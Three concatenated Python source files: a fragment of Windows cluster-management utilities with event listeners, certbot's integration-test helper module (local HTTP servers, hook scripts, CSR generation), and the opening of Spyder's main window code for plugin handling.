raise exceptions.ClusterGroupMigrationTimeOut(
group_name=group_name,
time_elapsed=time.time() - time_start)
def get_cluster_group_state_info(self, group_name):
"""Gets cluster group state info.
:return: a dict containing the following keys:
['state', 'migration_queued', 'owner_node']
"""
cluster_handle = None
group_handle = None
try:
cluster_handle = self._clusapi_utils.open_cluster()
group_handle = self._clusapi_utils.open_cluster_group(
cluster_handle, group_name)
state_info = self._get_cluster_group_state(group_handle)
migration_queued = self._is_migration_queued(
state_info['status_info'])
return dict(owner_node=state_info['owner_node'],
state=state_info['state'],
migration_queued=migration_queued)
finally:
if group_handle:
self._clusapi_utils.close_cluster_group(group_handle)
if cluster_handle:
self._clusapi_utils.close_cluster(cluster_handle)
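# Illustrative return value of get_cluster_group_state_info (the node name
# below is hypothetical):
#
#   {'owner_node': 'compute-node-1',
#    'state': constants.CLUSTER_GROUP_ONLINE,
#    'migration_queued': False}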
def _get_cluster_group_state(self, group_handle):
state_info = self._clusapi_utils.get_cluster_group_state(group_handle)
buff, buff_sz = self._clusapi_utils.cluster_group_control(
group_handle,
w_const.CLUSCTL_GROUP_GET_RO_COMMON_PROPERTIES)
status_info = self._clusapi_utils.get_cluster_group_status_info(
ctypes.byref(buff), buff_sz)
state_info['status_info'] = status_info
return state_info
def monitor_vm_failover(self, callback,
event_timeout_ms=_WMI_EVENT_TIMEOUT_MS):
"""Creates a monitor to check for new WMI MSCluster_Resource
events.
This method will poll the last _WMI_EVENT_CHECK_INTERVAL + 1
seconds for new events and listen for _WMI_EVENT_TIMEOUT_MS
milliseconds, since listening is a thread blocking action.
Any event object caught will then be processed.
"""
# TODO(lpetrut): mark this method as private once compute-hyperv
# stops using it. We should also remove the instance '_watcher'
# attribute since we end up spawning unused event listeners.
vm_name = None
new_host = None
try:
# wait for new event for _WMI_EVENT_TIMEOUT_MS milliseconds.
if patcher.is_monkey_patched('thread'):
wmi_object = tpool.execute(self._watcher,
event_timeout_ms)
else:
wmi_object = self._watcher(event_timeout_ms)
old_host = wmi_object.previous.OwnerNode
new_host = wmi_object.OwnerNode
# wmi_object.Name field is of the form:
# 'Virtual Machine nova-instance-template'
# wmi_object.Name field is a key and as such is not affected
# by locale, so it will always be 'Virtual Machine'
match = self._instance_name_regex.search(wmi_object.Name)
if match:
vm_name = match.group(1)
if vm_name:
try:
callback(vm_name, old_host, new_host)
except Exception:
LOG.exception(
"Exception during failover callback.")
except exceptions.x_wmi_timed_out:
pass
def get_vm_owner_change_listener(self):
def listener(callback):
while True:
# We avoid setting an infinite timeout in order to let
# the process gracefully stop. Note that the os-win WMI
# event listeners are meant to be used as long running
# daemons, so no stop API is provided ATM.
try:
self.monitor_vm_failover(
callback,
constants.DEFAULT_WMI_EVENT_TIMEOUT_MS)
except Exception:
LOG.exception("The VM cluster group owner change "
"event listener encountered an "
"unexpected exception.")
time.sleep(constants.DEFAULT_WMI_EVENT_TIMEOUT_MS / 1000)
return listener
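# Usage sketch (hypothetical callback; the listener blocks, so it is meant to
# be run in a background thread or greenthread, with `threading` assumed to be
# imported):
#
#   def _on_owner_changed(vm_name, old_host, new_host):
#       LOG.info("%s moved from %s to %s", vm_name, old_host, new_host)
#
#   listener = cluster_utils.get_vm_owner_change_listener()
#   threading.Thread(target=listener, args=(_on_owner_changed,),
#                    daemon=True).start()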
# At the moment, those event listeners are not meant to be used outside
# os-win, mostly because of the underlying API limitations.
class _ClusterEventListener(object):
_notif_keys = {}
_notif_port_h = None
_cluster_handle = None
_running = False
def __init__(self, cluster_handle, notif_filters_list):
self._cluster_handle = cluster_handle
self._notif_filters_list = notif_filters_list
self._clusapi_utils = _clusapi_utils.ClusApiUtils()
self._event_queue = queue.Queue()
self._setup()
def __enter__(self):
self._ensure_listener_running()
return self
def _get_notif_key_dw(self, notif_key):
notif_key_dw = self._notif_keys.get(notif_key)
if notif_key_dw is None:
notif_key_dw = wintypes.DWORD(notif_key)
# We have to make sure those addresses are preserved.
self._notif_keys[notif_key] = notif_key_dw
return notif_key_dw
def _add_filter(self, notif_filter, notif_key=0):
notif_key_dw = self._get_notif_key_dw(notif_key)
# A notification port handle is created if we do not already have one.
self._notif_port_h = self._clusapi_utils.create_cluster_notify_port_v2(
self._cluster_handle, notif_filter,
self._notif_port_h, notif_key_dw)
def _setup_notif_port(self):
for notif_filter in self._notif_filters_list:
filter_struct = clusapi_def.NOTIFY_FILTER_AND_TYPE(
dwObjectType=notif_filter['object_type'],
FilterFlags=notif_filter['filter_flags'])
notif_key = notif_filter.get('notif_key', 0)
self._add_filter(filter_struct, notif_key)
def _setup(self):
self._setup_notif_port()
# If eventlet monkey patching is used, this will actually be a
# greenthread. We just don't want to enforce eventlet usage.
worker = threading.Thread(target=self._listen)
worker.setDaemon(True)
self._running = True
worker.start()
def __exit__(self, exc_type, exc_value, traceback):
self.stop()
def _signal_stopped(self):
self._running = False
self._event_queue.put(None)
def stop(self):
self._signal_stopped()
if self._notif_port_h:
self._clusapi_utils.close_cluster_notify_port(self._notif_port_h)
def _listen(self):
while self._running:
try:
# We're using an indefinite timeout here. When the listener is
# closed, this will raise an 'invalid handle value' error,
# which we're going to ignore.
event = _utils.avoid_blocking_call(
self._clusapi_utils.get_cluster_notify_v2,
self._notif_port_h,
timeout_ms=-1)
processed_event = self._process_event(event)
if processed_event:
self._event_queue.put(processed_event)
except Exception:
if self._running:
LOG.exception(
"Unexpected exception in event listener loop. "
"The cluster event listener will now close.")
self._signal_stopped()
def _process_event(self, event):
return event
def get(self, timeout=None):
self._ensure_listener_running()
event = self._event_queue.get(timeout=timeout)
self._ensure_listener_running()
return event
def _ensure_listener_running(self):
if not self._running:
raise exceptions.OSWinException(
_("Cluster event listener is not running."))
class _ClusterGroupStateChangeListener(_ClusterEventListener):
_NOTIF_KEY_GROUP_STATE = 0
_NOTIF_KEY_GROUP_COMMON_PROP = 1
_notif_filters_list = [
dict(object_type=w_const.CLUSTER_OBJECT_TYPE_GROUP,
filter_flags=w_const.CLUSTER_CHANGE_GROUP_STATE_V2,
notif_key=_NOTIF_KEY_GROUP_STATE),
dict(object_type=w_const.CLUSTER_OBJECT_TYPE_GROUP,
filter_flags=w_const.CLUSTER_CHANGE_GROUP_COMMON_PROPERTY_V2,
notif_key=_NOTIF_KEY_GROUP_COMMON_PROP)]
def __init__(self, cluster_handle, group_name=None):
self._group_name = group_name
super(_ClusterGroupStateChangeListener, self).__init__(
cluster_handle, self._notif_filters_list)
def _process_event(self, event):
group_name = event['cluster_object_name']
if self._group_name and self._group_name.lower() != group_name.lower():
return
preserved_keys = ['cluster_object_name', 'object_type',
'filter_flags', 'notif_key']
processed_event = {key: event[key] for key in preserved_keys}
notif_key = event['notif_key']
if notif_key == self._NOTIF_KEY_GROUP_STATE:
if event['buff_sz'] != ctypes.sizeof(wintypes.DWORD):
raise exceptions.ClusterPropertyRetrieveFailed()
state_p = ctypes.cast(event['buff'], wintypes.PDWORD)
state = state_p.contents.value
processed_event['state'] = state
return processed_event
elif notif_key == self._NOTIF_KEY_GROUP_COMMON_PROP:
try:
status_info = (
self._clusapi_utils.get_cluster_group_status_info(
ctypes.byref(event['buff']), event['buff_sz']))
processed_event['status_info'] = status_info
return processed_event
except exceptions.ClusterPropertyListEntryNotFound:
# At the moment, we only care about the 'StatusInformation'
# common property.
pass
|
misc.py
|
"""
Misc module contains stateless functions that could be used during pytest execution,
or outside during setup/teardown of the integration tests environment.
"""
import contextlib
import errno
import functools
import http.server as SimpleHTTPServer
import os
import re
import shutil
import socketserver
import stat
import sys
import tempfile
import threading
import time
import warnings
from typing import Generator
from typing import Iterable
from typing import List
from typing import Optional
from typing import Tuple
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.serialization import Encoding
from cryptography.hazmat.primitives.serialization import NoEncryption
from cryptography.hazmat.primitives.serialization import PrivateFormat
from cryptography.x509 import load_pem_x509_certificate
from cryptography.x509 import Certificate
from OpenSSL import crypto
import pkg_resources
import requests
from certbot_integration_tests.certbot_tests.context import IntegrationTestsContext
from certbot_integration_tests.utils.constants import PEBBLE_ALTERNATE_ROOTS
from certbot_integration_tests.utils.constants import PEBBLE_MANAGEMENT_URL
RSA_KEY_TYPE = 'rsa'
ECDSA_KEY_TYPE = 'ecdsa'
def _suppress_x509_verification_warnings() -> None:
try:
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
except ImportError:
# Handle old versions of requests with vendorized urllib3
# pylint: disable=no-member
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings( # type: ignore[attr-defined]
InsecureRequestWarning)
def check_until_timeout(url: str, attempts: int = 30) -> None:
"""
Wait and block until given url responds with status 200, or raise an exception
after the specified number of attempts.
:param str url: the URL to test
:param int attempts: the number of times to try to connect to the URL
:raise ValueError: exception raised if unable to reach the URL
"""
_suppress_x509_verification_warnings()
for _ in range(attempts):
time.sleep(1)
try:
if requests.get(url, verify=False).status_code == 200:
return
except requests.exceptions.ConnectionError:
pass
raise ValueError('Error, url did not respond after {0} attempts: {1}'.format(attempts, url))
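# Usage sketch (hypothetical URL): block until a local test server answers
# with HTTP 200, failing after ~30 one-second attempts.
#
#   check_until_timeout('http://localhost:5002/', attempts=30)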
class GracefulTCPServer(socketserver.TCPServer):
"""
This subclass of TCPServer allows graceful reuse of an address that has
just been released by another instance of TCPServer.
"""
allow_reuse_address = True
@contextlib.contextmanager
def create_http_server(port: int) -> Generator[str, None, None]:
"""
Setup and start an HTTP server for the given TCP port.
This server stays active for the lifetime of the context, and is automatically
stopped with context exit, while its temporary webroot is deleted.
:param int port: the TCP port to use
:return str: the temporary webroot attached to this server
"""
with tempfile.TemporaryDirectory() as webroot:
# Setting the directory argument of SimpleHTTPRequestHandler causes
# files to be served from that directory.
handler = functools.partial(SimpleHTTPServer.SimpleHTTPRequestHandler, directory=webroot)
server = GracefulTCPServer(('', port), handler)
thread = threading.Thread(target=server.serve_forever)
thread.start()
try:
check_until_timeout('http://localhost:{0}/'.format(port))
yield webroot
finally:
server.shutdown()
thread.join()
server.server_close()
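# Usage sketch (hypothetical port and file): serve a temporary webroot over
# HTTP for the duration of the block.
#
#   with create_http_server(5002) as webroot:
#       with open(os.path.join(webroot, 'index.html'), 'w') as file_h:
#           file_h.write('hello')
#       assert requests.get('http://localhost:5002/index.html').text == 'hello'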
def list_renewal_hooks_dirs(config_dir: str) -> List[str]:
"""
Find and return paths of all hook directories for the given certbot config directory
:param str config_dir: path to the certbot config directory
:return str[]: list of paths to the standard hooks directories for this certbot instance
"""
renewal_hooks_root = os.path.join(config_dir, 'renewal-hooks')
return [os.path.join(renewal_hooks_root, item) for item in ['pre', 'deploy', 'post']]
def generate_test_file_hooks(config_dir: str, hook_probe: str) -> None:
"""
Create a suite of certbot hook scripts and put them in the relevant hook directory
for the given certbot configuration directory. These scripts, when executed, will write
specific verbs in the given hook_probe file to allow asserting they have effectively
been executed. The deploy hook also checks that the renewal environment variables are set.
:param str config_dir: current certbot config directory
:param str hook_probe: path to the hook probe to test hook scripts execution
"""
hook_path = pkg_resources.resource_filename('certbot_integration_tests', 'assets/hook.py')
for hook_dir in list_renewal_hooks_dirs(config_dir):
# We want an equivalent of bash `mkdir -p $HOOK_DIR`, which does not fail if one folder of
# the hierarchy already exists, while os.makedirs fails by default in that case. Python 3 has
# an optional parameter `exist_ok` to not fail on an existing dir, but Python 2.7 does not.
# So we wrap it in a try/except/pass. To be removed when support for py27 is dropped.
try:
os.makedirs(hook_dir)
except OSError as error:
if error.errno != errno.EEXIST:
raise
if os.name != 'nt':
entrypoint_script_path = os.path.join(hook_dir, 'entrypoint.sh')
entrypoint_script = '''\
#!/usr/bin/env bash
set -e
"{0}" "{1}" "{2}" >> "{3}"
'''.format(sys.executable, hook_path, entrypoint_script_path, hook_probe)
else:
entrypoint_script_path = os.path.join(hook_dir, 'entrypoint.ps1')
entrypoint_script = '''\
& "{0}" "{1}" "{2}" >> "{3}"
'''.format(sys.executable, hook_path, entrypoint_script_path, hook_probe)
with open(entrypoint_script_path, 'w') as file_h:
file_h.write(entrypoint_script)
os.chmod(entrypoint_script_path, os.stat(entrypoint_script_path).st_mode | stat.S_IEXEC)
@contextlib.contextmanager
def manual_http_hooks(http_server_root: str,
http_port: int) -> Generator[Tuple[str, str], None, None]:
"""
Generate suitable http-01 hook commands for test purposes in the given HTTP
server webroot directory. These hook commands use temporary python scripts
that are deleted upon context exit.
:param str http_server_root: path to the HTTP server configured to serve http-01 challenges
:param int http_port: HTTP port that the HTTP server listens on
:return (str, str): a tuple containing the authentication hook and cleanup hook commands
"""
tempdir = tempfile.mkdtemp()
try:
auth_script_path = os.path.join(tempdir, 'auth.py')
with open(auth_script_path, 'w') as file_h:
file_h.write('''\
#!/usr/bin/env python
import os
import requests
import time
import sys
challenge_dir = os.path.join('{0}', '.well-known', 'acme-challenge')
os.makedirs(challenge_dir)
challenge_file = os.path.join(challenge_dir, os.environ.get('CERTBOT_TOKEN'))
with open(challenge_file, 'w') as file_h:
file_h.write(os.environ.get('CERTBOT_VALIDATION'))
url = 'http://localhost:{1}/.well-known/acme-challenge/' + os.environ.get('CERTBOT_TOKEN')
for _ in range(0, 10):
time.sleep(1)
try:
if requests.get(url).status_code == 200:
sys.exit(0)
except requests.exceptions.ConnectionError:
pass
raise ValueError('Error, url did not respond after 10 attempts: {{0}}'.format(url))
'''.format(http_server_root.replace('\\', '\\\\'), http_port))
os.chmod(auth_script_path, 0o755)
cleanup_script_path = os.path.join(tempdir, 'cleanup.py')
with open(cleanup_script_path, 'w') as file_h:
file_h.write('''\
#!/usr/bin/env python
import os
import shutil
well_known = os.path.join('{0}', '.well-known')
shutil.rmtree(well_known)
'''.format(http_server_root.replace('\\', '\\\\')))
os.chmod(cleanup_script_path, 0o755)
yield ('{0} {1}'.format(sys.executable, auth_script_path),
'{0} {1}'.format(sys.executable, cleanup_script_path))
finally:
shutil.rmtree(tempdir)
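# Usage sketch (hypothetical domain and port; assumes `subprocess` is
# imported): the yielded commands are meant to be passed to certbot's
# --manual-auth-hook and --manual-cleanup-hook options.
#
#   with create_http_server(5002) as webroot:
#       with manual_http_hooks(webroot, 5002) as (auth_hook, cleanup_hook):
#           subprocess.check_call(
#               ['certbot', 'certonly', '--manual', '-d', 'example.test',
#                '--manual-auth-hook', auth_hook,
#                '--manual-cleanup-hook', cleanup_hook])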
def generate_csr(domains: Iterable[str], key_path: str, csr_path: str,
key_type: str = RSA_KEY_TYPE) -> None:
"""
Generate a private key, and a CSR for the given domains using this key.
:param domains: the domain names to include in the CSR
:type domains: `list` of `str`
:param str key_path: path to the private key that will be generated
:param str csr_path: path to the CSR that will be generated
:param str key_type: type of the key (misc.RSA_KEY_TYPE or misc.ECDSA_KEY_TYPE)
"""
if key_type == RSA_KEY_TYPE:
key = crypto.PKey()
key.generate_key(crypto.TYPE_RSA, 2048)
elif key_type == ECDSA_KEY_TYPE:
with warnings.catch_warnings():
# Ignore a warning on some old versions of cryptography
warnings.simplefilter('ignore', category=PendingDeprecationWarning)
_key = ec.generate_private_key(ec.SECP384R1(), default_backend())
# This type ignore directive is required due to an outdated version of types-cryptography.
# It can be removed once package types-pyOpenSSL depends on cryptography instead of
# types-cryptography and so types-cryptography is not installed anymore.
# See https://github.com/python/typeshed/issues/5618
_bytes = _key.private_bytes(encoding=Encoding.PEM, # type: ignore
format=PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=NoEncryption())
key = crypto.load_privatekey(crypto.FILETYPE_PEM, _bytes)
else:
raise ValueError('Invalid key type: {0}'.format(key_type))
with open(key_path, 'wb') as file_h:
file_h.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
req = crypto.X509Req()
san = ', '.join('DNS:{0}'.format(item) for item in domains)
san_constraint = crypto.X509Extension(b'subjectAltName', False, san.encode('utf-8'))
req.add_extensions([san_constraint])
req.set_pubkey(key)
req.set_version(2)
req.sign(key, 'sha256')
with open(csr_path, 'wb') as file_h:
file_h.write(crypto.dump_certificate_request(crypto.FILETYPE_ASN1, req))
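# Usage sketch (hypothetical paths): generate an ECDSA private key and a
# DER-encoded CSR covering two domains.
#
#   generate_csr(['example.test', 'www.example.test'],
#                key_path='/tmp/key.pem', csr_path='/tmp/csr.der',
#                key_type=ECDSA_KEY_TYPE)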
def read_certificate(cert_path: str) -> str:
"""
Load the certificate from the provided path, and return a human readable version
of it (TEXT mode).
:param str cert_path: the path to the certificate
:returns: the TEXT version of the certificate, as it would be displayed by openssl binary
"""
with open(cert_path, 'rb') as file:
data = file.read()
cert = crypto.load_certificate(crypto.FILETYPE_PEM, data)
return crypto.dump_certificate(crypto.FILETYPE_TEXT, cert).decode('utf-8')
def load_sample_data_path(workspace: str) -> str:
"""
Load the certbot configuration example designed for OCSP tests, and return its path
:param str workspace: current test workspace directory path
:returns: the path to the loaded sample data directory
:rtype: str
"""
original = pkg_resources.resource_filename('certbot_integration_tests', 'assets/sample-config')
copied = os.path.join(workspace, 'sample-config')
shutil.copytree(original, copied, symlinks=True)
if os.name == 'nt':
# Fix the symlinks on Windows if GIT is not configured to create them upon checkout
for lineage in [
'a.encryption-example.com',
'b.encryption-example.com',
'c.encryption-example.com',
]:
current_live = os.path.join(copied, 'live', lineage)
for name in os.listdir(current_live):
if name != 'README':
current_file = os.path.join(current_live, name)
if not os.path.islink(current_file):
with open(current_file) as file_h:
src = file_h.read()
os.unlink(current_file)
os.symlink(os.path.join(current_live, src), current_file)
return copied
def echo(keyword: str, path: Optional[str] = None) -> str:
"""
Generate a platform independent executable command
that echoes the given keyword into the given file.
:param keyword: the keyword to echo (must be a single keyword)
:param path: path to the file where the keyword is echoed
:return: the executable command
"""
if not re.match(r'^\w+$', keyword):
raise ValueError('Error, keyword `{0}` is not a single keyword.'
.format(keyword))
return '{0} -c "print(\'{1}\')"{2}'.format(
os.path.basename(sys.executable), keyword, ' >> "{0}"'.format(path) if path else '')
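# Usage sketch: echo('deploy', path='/tmp/probe') returns a command along the
# lines of
#
#   python -c "print('deploy')" >> "/tmp/probe"
#
# (the interpreter name depends on sys.executable), suitable as a platform
# independent hook command.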
def get_acme_issuers(context: IntegrationTestsContext) -> List[Certificate]:
"""Gets the list of one or more issuer certificates from the ACME server used by the
context.
:param context: the testing context.
:return: the `list of x509.Certificate` representing the list of issuers.
"""
# TODO: in fact, Boulder has alternate chains in config-next/, just not yet in config/.
if context.acme_server != "pebble":
raise NotImplementedError()
_suppress_x509_verification_warnings()
issuers = []
for i in range(PEBBLE_ALTERNATE_ROOTS + 1):
request = requests.get(PEBBLE_MANAGEMENT_URL + '/intermediates/{}'.format(i), verify=False)
issuers.append(load_pem_x509_certificate(request.content, default_backend()))
return issuers
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import shutil
import signal
import socket
import glob
import sys
import threading
import traceback
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QCoreApplication, Qt, QTimer, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QIcon, QKeySequence
from qtpy.QtWidgets import (QAction, QApplication, QMainWindow, QMenu,
QMessageBox, QShortcut, QStyleFactory, QCheckBox)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) imports of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import __version__
from spyder import dependencies
from spyder.app import tour
from spyder.app.utils import (create_splash_screen, delete_lsp_log_files,
qt_message_handler, set_links_color,
setup_logging, set_opengl_implementation, Spy)
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_source_path,
get_safe_mode, is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.utils.image_path_manager import get_image_path
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import configparser as cp, PY3, to_text_string
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.palette import QStylePalette
from spyder.utils.qthelpers import (create_action, add_actions, file_uri,
qapplication, start_file)
from spyder.utils.stylesheet import APP_STYLESHEET
from spyder.app.solver import (
find_external_plugins, find_internal_plugins, solve_plugin_dependencies)
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import Plugins, SpyderPluginV2, SpyderDockablePlugin
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
# Keeping a reference to the original sys.exit before patching it
ORIGINAL_SYS_EXIT = sys.exit
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
# Set the index for the default tour
DEFAULT_TOUR = 0
#==============================================================================
# Install Qt message handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
# --- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name, error=True):
"""
Return a plugin instance by providing the plugin name.
"""
for name, plugin in self._PLUGINS.items():
if plugin_name == name:
return plugin
else:
if error:
raise SpyderAPIError(
'Plugin "{}" not found!'.format(plugin_name))
else:
return None
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def add_plugin(self, plugin, external=False):
"""
Add plugin to plugins dictionary.
"""
self._PLUGINS[plugin.NAME] = plugin
if external:
self._EXTERNAL_PLUGINS[plugin.NAME] = plugin
else:
self._INTERNAL_PLUGINS[plugin.NAME] = plugin
def register_plugin(self, plugin, external=False):
"""
Register a plugin in Spyder Main Window.
"""
self.set_splash(_("Loading {}...").format(plugin.get_name()))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
self.show_plugin_compatibility_message(message)
return
# Signals
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_restart_requested.connect(self.restart)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Register plugin
plugin._register()
plugin.register()
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
self.add_plugin(plugin, external=external)
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
self.register_shortcut(action, context, action_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
self.register_shortcut(sc, context, name)
self.register_shortcut(plugin.toggle_view_action, context, name)
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio_requested,
plugin.sig_status_message_requested,
]
for sig in signals:
try:
sig.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
shortcut = None
if shortcut is not None:
self.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
@property
def last_plugin(self):
"""
Get last plugin with focus if it is a dockable widget.
If a non-dockable plugin has the focus, this will return the Editor
plugin by default.
"""
# Needed to prevent errors with the old API at
# spyder/plugins/base::_switch_to_plugin
return self.layouts.get_last_plugin()
def maximize_dockwidget(self, restore=False):
"""
This is needed to prevent errors with the old API at
spyder/plugins/base::_switch_to_plugin.
See spyder-ide/spyder#15164
Parameters
----------
restore : bool, optional
If the current dockwidget needs to be restored to its unmaximized
state. The default is False.
"""
self.layouts.maximize_dockwidget(restore=restore)
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
last_plugin = self.last_plugin
try:
# New API
if (last_plugin is not None
and last_plugin.get_widget().is_maximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
except AttributeError:
# Old API
if (last_plugin is not None and self.last_plugin._ismaximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
self.widgetlist.remove(plugin)
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets."""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
def tabify_plugin(self, plugin, default=None):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [default]
tabify = getattr(plugin, 'TABIFY', [default])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# If TABIFY is just [None] or an empty list, there is nothing to tabify
if tabify in [[None], []]:
return False
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
